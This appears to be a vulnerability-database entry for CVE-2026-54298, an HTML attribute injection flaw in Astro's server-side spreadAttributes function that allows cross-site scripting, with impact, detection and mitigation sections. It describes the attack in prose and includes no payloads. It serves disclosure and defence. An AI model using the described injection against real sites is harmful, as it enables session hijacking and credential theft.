CVE-2026-54298
Analyzed Analyzed - Analysis Complete
HTML Attribute Injection in Astro Framework

Publication date: 2026-06-22

Last updated on: 2026-06-22

Assigner: GitHub, Inc.

Description
Astro is a web framework. Prior to 6.4.6, the spreadAttributes function in Astro's server-side rendering pipeline iterates over object keys and passes them directly to addAttribute, which interpolates the key into the HTML output without escaping. When a developer uses the spread syntax {...props} on an HTML element and the object keys come from an untrusted source (API, CMS, URL parameters), an attacker can inject arbitrary HTML attributes including event handlers like onmousemove, onclick, or break out of the attribute context entirely to inject new elements. This vulnerability is fixed in 6.4.6.
CVSS Scores
EPSS Scores
Probability:
Percentile:
Meta Information
Published
2026-06-22
Last Modified
2026-06-22
Generated
2026-06-23
AI Q&A
2026-06-22
EPSS Evaluated
N/A
NVD
CVE-2026-54298
EUVD
EUVD-2026-38336
Affected Vendors & Products
Showing 1 associated CPE
Vendor Product Version / Range
astro astro to 6.4.6 (exc)
Helpful Resources
Exploitability
CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-79 The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.
Attack-Flow Graph
AI Quick Actions
Instant insights powered by AI
Executive Summary

The vulnerability in Astro versions prior to 6.4.6 involves the spreadAttributes function in the server-side rendering pipeline. This function iterates over object keys from untrusted sources and passes them directly to addAttribute without escaping the attribute names. When a developer uses the spread syntax {...props} on an HTML element, an attacker can inject malicious HTML attributes, including event handlers like onmousemove or onclick, or even break out of the attribute context to inject new elements. This happens because attribute names are not properly escaped, allowing arbitrary JavaScript execution.

Impact Analysis

This vulnerability can lead to Cross-Site Scripting (XSS) attacks, enabling attackers to execute arbitrary JavaScript in the context of the affected website.

  • Session hijacking through cookie theft.
  • Credential theft via fake login forms or keyloggers.
  • Page defacement.
  • Redirection to attacker-controlled domains.
Detection Guidance

Detection of this vulnerability involves identifying if your Astro application uses the spread syntax {...props} on HTML elements where the object keys originate from untrusted sources such as APIs, CMS, or URL parameters.

You can inspect your server-side rendered HTML output for unescaped attribute names that include suspicious event handlers like onmousemove or onclick, or malformed attributes that could indicate injection.

Since this is a server-side rendering issue, network detection might involve monitoring HTTP responses for injected scripts or unusual HTML attributes.

There are no specific commands provided in the resources, but general approaches include:

  • Using grep or similar tools to search your codebase for usage of spread syntax {...props} in Astro components.
  • Manually reviewing or scripting checks on rendered HTML output for unescaped attribute names or suspicious event handlers.
  • Using web vulnerability scanners that detect reflected or stored XSS vulnerabilities in your application.
Mitigation Strategies

The primary mitigation step is to upgrade Astro to version 6.4.6 or later, where this vulnerability is fixed.

Until the upgrade is applied, avoid using the spread syntax {...props} on HTML elements with object keys derived from untrusted sources such as APIs, CMS, or URL parameters.

Validate and sanitize all input data that could be used as attribute keys to prevent injection of malicious HTML attributes.

Review your server-side rendering pipeline to ensure attribute names are properly escaped or validated before being added to HTML output.

Chat Assistant
Ask questions about this CVE
Hi! I’m here to help you understand CVE-2026-54298. Ask me anything about the vulnerability, its impact, or mitigation strategies.
0/70
EPSS Chart